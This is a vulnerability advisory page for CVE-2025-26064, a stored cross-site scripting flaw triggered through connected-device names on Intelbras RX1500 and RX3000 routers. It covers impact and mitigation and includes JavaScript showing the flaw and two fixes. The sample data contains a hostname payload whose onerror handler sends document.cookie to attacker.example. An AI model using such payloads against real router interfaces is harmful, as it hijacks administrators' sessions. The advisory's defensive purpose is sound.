CVE-2025-26064 in Intelbras RX 1500

Summary

by MITRE • 07/31/2025

A cross-site scripting (XSS) vulnerability in Intelbras RX1500 v2.2.9 and RX3000 v1.0.11 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the name of a connected device.


Analysis

by VulDB Data Team • 08/04/2025

This cross-site scripting vulnerability affects Intelbras RX1500 routers running firmware version 2.2.9 and RX3000 routers running firmware version 1.0.11. The flaw is a combination of missing input validation and missing output encoding when the name of a connected device is shown in the web management interface: the name is supplied by the client itself (for example, the hostname a device announces when it joins the network) and is written into the page without HTML escaping. The weakness is CWE-79 - Improper Neutralization of Input During Web Page Generation. Because the payload is stored with the device record and delivered every time the client list is rendered, this is stored XSS rather than reflected XSS. The attacker needs no credentials for the management interface; being able to join the network with a device whose name carries the payload is sufficient. The script runs when an authenticated administrator opens the page that lists connected devices.

Technically, the device accepts the device name without restricting characters that a browser interprets as markup (angle brackets, quotes, event-handler attributes) and then emits the raw string into the HTML response. A name such as <img src=x onerror=alert(document.cookie)> is therefore parsed as an element with an event handler rather than as text, and the handler executes in the browser of whichever authenticated user views the connected-devices page. Hostname fields are typically short and may tolerate only a limited character set, which constrains payload size but does not prevent a small loader that fetches a larger script from an attacker-controlled host. Since the name persists in the device's client table, the injected code is re-delivered on every subsequent view until the entry is cleared.

The operational impact is significant because the script runs inside the administrator's authenticated session. From there it can read anything the management pages expose, submit configuration changes through the interface on the administrator's behalf, exfiltrate session cookies where they are not marked HttpOnly, or redirect the administrator to a malicious site. In effect, a single page view can hand an attacker who is merely connected to the LAN or Wi-Fi control over the router's configuration. No physical access is required and no management credentials are needed to plant the payload; the only interaction is the administrator looking at the connected-devices list. The corresponding ATT&CK technique is T1059.007 - Command and Scripting Interpreter: JavaScript.

Mitigation starts with firmware: check Intelbras for a release newer than the affected versions (2.2.9 for the RX1500, 1.0.11 for the RX3000) that addresses this issue and apply it. The code-level fix is contextual output encoding, HTML-escaping the device name at the point where it is written into the page, with an ingestion-time allowlist on stored device names (letters, digits and hyphens, as in hostnames) as defense in depth. Note that a web application firewall in front of the management interface does not help here, because the payload enters when the client joins the network rather than through an HTTP request. Until fixed firmware is installed, treat every client on the LAN and guest network as untrusted, restrict access to the management interface to a trusted management segment or wired port where the device allows it, and use a dedicated browser profile for router administration so that a stolen session is of limited value. A Content Security Policy that disallows inline scripts would block this class of payload, although embedded-device web interfaces rarely ship one. Dynamic testing that treats client-supplied fields such as hostnames as attacker input would have found this weakness, which is the textbook case of OWASP Top 10 2021 A03 (Injection) and of the input validation controls in NIST SP 800-53 (SI-10).
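As an added illustration of the rendering flaw and the two fixes described in the analysis and mitigation paragraphs above (this is example code written for this page, not Intelbras firmware code; the lease records, the hostname payload and the function names are constructed), the JavaScript below shows the vulnerable string-concatenation pattern, the output-encoding fix, and ingestion-time hostname validation:

```javascript
// Constructed DHCP-lease-style records. The second name is the kind of
// payload a rogue client could announce as its hostname (constructed).
const LEASES = [
  { mac: "aa:bb:cc:dd:ee:01", ip: "192.168.0.10", name: "laptop-ana" },
  { mac: "aa:bb:cc:dd:ee:02", ip: "192.168.0.11",
    name: '<img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">' },
];

// Vulnerable pattern: the raw name is concatenated into HTML, so any
// markup in it becomes part of the document (stored XSS).
function renderClientsVulnerable(leases) {
  return leases.map(l =>
    `<tr><td>${l.name}</td><td>${l.ip}</td><td>${l.mac}</td></tr>`).join("");
}

// Fix 1: contextual output encoding for an HTML text-node context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}
function renderClientsSafe(leases) {
  return leases.map(l =>
    `<tr><td>${escapeHtml(l.name)}</td><td>${escapeHtml(l.ip)}</td><td>${escapeHtml(l.mac)}</td></tr>`).join("");
}

// Fix 2 (defense in depth): validate the name when the lease is recorded.
// RFC 1123 hostname syntax: labels of letters, digits and hyphens, 1-63
// chars each, not starting or ending with a hyphen, 253 chars overall.
// Anything else is replaced by a placeholder derived from the MAC, so the
// UI never stores attacker-controlled free text. (Hypothetical helper.)
const HOSTNAME_RE =
  /^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;
function normalizeLease(lease) {
  const ok = HOSTNAME_RE.test(lease.name);
  const fallback = `unknown-${lease.mac.replace(/:/g, "").slice(-6)}`;
  return { ...lease, name: ok ? lease.name : fallback, nameRejected: !ok };
}

// Check used in this demo: does the rendered HTML still contain a live
// tag that originated in a device name? Escaped output contains "&lt;img",
// never "<img", so this distinguishes the two renderers.
function containsMarkup(html) {
  return /<(img|script|svg|iframe)\b/i.test(html);
}

console.log("vulnerable:", renderClientsVulnerable(LEASES));
console.log("escaped:   ", renderClientsSafe(LEASES));
console.log("validated: ", renderClientsVulnerable(LEASES.map(normalizeLease)));
```

Either fix alone removes the script execution; the two together mean a future template that forgets to escape still has nothing dangerous to render, which is the layering the mitigation paragraph recommends.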

Disclosure

07/31/2025

Moderation

accepted

CPE

ready

Exploit

Download

EPSS

0.00963

KEV

no

Activities

very low
